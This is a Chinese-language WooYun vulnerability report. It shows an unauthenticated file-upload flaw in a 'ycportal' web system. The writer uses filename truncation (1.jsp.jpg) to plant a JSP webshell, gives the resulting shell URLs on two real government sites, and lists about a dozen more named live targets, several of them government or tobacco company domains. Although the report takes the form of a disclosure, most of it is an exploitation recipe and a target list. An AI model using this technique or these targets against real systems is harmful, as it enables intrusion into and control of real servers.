WooYun.org

img 此次漏洞结合了
http://wooyun.org/bugs/wooyun-2010-079578
大牛在这个目录下还有个上传没发现，搜索了下没有看到重复。
上传文件：
//ycportal/jsp/AD/ADadd.jsp
有的主页文件不一样但是都在
jsp/AD/ADadd.jsp
shell地址：路径为 /ycportal/styleimages/adimages/+文件名
我用案例一来演示下：
http://www.rzdonggang.gov.cn/ycportal/jsp/AD/ADadd.jsp?checkbox_id=10

然后上传截断：上传1.jsp.jpg

得到shell地址：
http://www.rzdonggang.gov.cn/ycportal/styleimages/adimages/yjh.jsp

案例二：
http://ccd.jxfda.gov.cn/ycportal//jsp/AD/ADadd.jsp?checkbox_id=10
src="/upload/201502/281613478693f12d6aa0e611a421a13586ddb825.jpg" alt="360截图20150228161338146.jpg" />
shell地址：
http://ccd.jxfda.gov.cn/ycportal/styleimages/adimages/yjh.jsp

<
还有更多案例：
http://59.48.8.134/ycportal/jsp/AD/ADadd.jsp?checkbox_id=10
http://www.dtycgs.cn/ycportal/jsp/AD/ADadd.jsp?checkbox_id=10
http://ccd.jxfda.gov.cn/ycportal//jsp/AD/ADadd.jsp?checkbox_id=10
http://www.rzdonggang.gov.cn/ycportal/jsp/AD/ADadd.jsp?checkbox_id=10
http://www.jxfdacdc.cn//ycportal/jsp/AD/ADadd.jsp?checkbox_id=10
http://www.sxlfyc.com/ycportal/jsp/AD/ADadd.jsp?checkbox_id=10
http://www.jztobacco.com.cn/ycportal/jsp/AD/ADadd.jsp?checkbox_id=10
http://www.lvlyc.com.cn/ycportal//jsp/AD/ADadd.jsp?checkbox_id=10
http://www.yqycgs.com.cn/ycportal/jsp/AD/ADadd.jsp?checkbox_id=10
http://ycycgs.com.cn/ycportal/jsp/AD/ADadd.jsp?checkbox_id=10
http://www.dtycgs.cn:9080/ycportal/jsp/AD/ADadd.jsp?checkbox_id=10
http://szycgs.cn/ycportal/jsp/AD/ADadd.jsp?checkbox_id=10